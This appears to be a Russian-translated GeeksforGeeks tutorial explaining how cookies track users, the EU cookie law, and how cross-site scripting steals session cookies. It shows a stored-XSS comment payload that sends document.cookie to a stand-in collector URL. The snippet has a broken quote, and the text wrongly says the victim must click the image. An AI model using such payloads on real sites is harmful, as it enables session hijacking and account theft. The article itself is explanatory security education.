Отслеживание и кража файлов cookie с использованием межсайтовых скриптов

Опубликовано: 14 Июля, 2021

Как файлы cookie используются на веб-сайте

Файл cookie - это случайно сгенерированная буквенно-цифровая строка, которая генерируется при посещении веб-страницы и отправляется этой веб-страницей в ваш браузер для хранения в качестве записи вашего присутствия на этом веб-сайте, чтобы этот сайт мог вас распознать, когда вы его посещаете. снова из-за вашего предыдущего сеанса (известного как идентификатор сеанса). Но это не единственная цель файлов cookie, они также широко используются для отслеживания ваших предпочтений в Интернете, они перемещаются с одного сервера на другой и могут быть легко перехвачены и украдены. В этой статье рассказывается, как файлы cookie перемещаются по сети и как их можно украсть.

Путь печенья

Как было сказано ранее, когда мы запрашиваем веб-страницу на сервере, сервер связывается с этим сайтом и отображает веб-страницу на нашем локальном компьютере. При рендеринге веб-страницы, которая в основном состоит из HTML, CSS и некоторого количества JavaScript, он также отправляет файл cookie (файл cookie первой стороны), который идентифицирует сеанс.
Помимо веб-сайта, когда мы посещаем веб-страницу, мы часто видим много рекламы. Эти объявления фактически не являются частью этого веб-сайта, но поставляются на веб-сайт с разных серверов по всему миру в обмен на деньги. Каждый раз, когда мы нажимаем на одно из этих объявлений, он отправляет файл cookie на соответствующий сервер, и сервер сохраняет его, чтобы отслеживать наши предпочтения. Серверы также взаимодействуют друг с другом и образуют рекламную сеть, разделяя ваши предпочтения и показывая вам рекламу в соответствии с этими предпочтениями в будущем. Таким образом, вас постоянно неосознанно отслеживают и наблюдают несколько организаций в сети. Помня об этом, Директива ЕС приняла так называемый «Закон о файлах cookie», согласно которому сайт должен запрашивать ваше разрешение на использование файлов cookie. Вот почему вы видите сообщение на определенном сайте вроде «Этот сайт использует файлы cookie для улучшения взаимодействия с пользователем ……» с просьбой о вашем разрешении.

Закон о файлах cookie - это часть законодательства о конфиденциальности, которая требует, чтобы веб-сайты получали согласие посетителей на хранение или извлечение любой информации на компьютере, смартфоне или планшете. Он был разработан для защиты конфиденциальности в Интернете, путем информирования потребителей о том, как информация о них собирается и используется в Интернете, и предоставления им выбора, разрешить это или нет.

Кража файлов cookie

Настройки покупок могут не классифицироваться как конфиденциальная информация о человеке, но корзины покупок в Интернете и банковские реквизиты являются действительно конфиденциальными данными, и все это также запоминается сайтом с помощью файлов cookie сеанса. Если злоумышленнику удастся завладеть вашими сеансовыми cookie-файлами, то этот человек сможет выдать себя за вас и за этот сайт и будет иметь доступ к вашим банковским реквизитам и вашей корзине покупок в Amazon, а также может заказывать товары из вашей учетной записи Amazon себе / ей. адрес тратить все свои деньги. Обычно это происходит, когда на сайте есть уязвимость, и злоумышленник использует нечто, известное как межсайтовый скриптинг (XSS), чтобы воспользоваться этой уязвимостью. Это чаще всего встречается на плохо закодированных веб-сайтах, где разработчик забывает включить определенные меры безопасности, чтобы злоумышленник не запустил межсайтовый скрипт.

Как веб-сайты используют XSS для кражи файлов cookie?

Я объясню это гипотетическим сценарием. Допустим, мы посещаем один из таких уязвимых сайтов, на котором есть раздел комментариев. Теперь на идеальном, безопасном веб-сайте в разделе комментариев должен быть текст только на простом английском языке, но на незащищенном сайте, если мы разместим код в разделе комментариев, сайт будет думать, что это какой-то код со стороны сервера, и он должен запустите этот код.




<script>
document.write( '<img src=" http://localhost/submitcookie.php? cookie ='
+ escape(document.cookie) + '" />);
</script>
  • Этот код при размещении в разделе комментариев заставит браузер думать, что это код Javascript (из-за тегов сценариев), отправленный сервером, и заставит его запустить его.
  • Когда какой-либо пользователь, посещающий сайт, просматривает раздел комментариев, он / она увидит ссылку на изображение в разделе комментариев, которое на самом деле является результатом выполнения скрипта.
  • Когда пользователь нажимает на эту ссылку, думая, что это изображение (тогда как на самом деле это файл php), он получает изображение, отображаемое в разделе комментариев. Чего они не знают, так это того, что эта ссылка незаметно запускала файл php, который захватывает их cookie.
  • Теперь файл cookie с идентификатором сеанса пользователя сохраняется в базе данных злоумышленников, и злоумышленник может выдавать себя за этого пользователя на этом сайте.

Связанная статья:
Как файлы cookie используются на веб-сайте
Взлом сеанса

Ссылки: Computerhile - канал на YouTube

Эта статья предоставлена Палашем Нигамом. Если вам нравится GeeksforGeeks, и вы хотели бы внести свой вклад, вы также можете написать статью с помощью provide.geeksforgeeks.org или отправить ее по электронной почте на deposit@geeksforgeeks.org. Посмотрите, как ваша статья появляется на главной странице GeeksforGeeks, и помогите другим гикам.

Пожалуйста, напишите комментарии, если вы обнаружите что-то неправильное, или вы хотите поделиться дополнительной информацией по теме, обсужденной выше.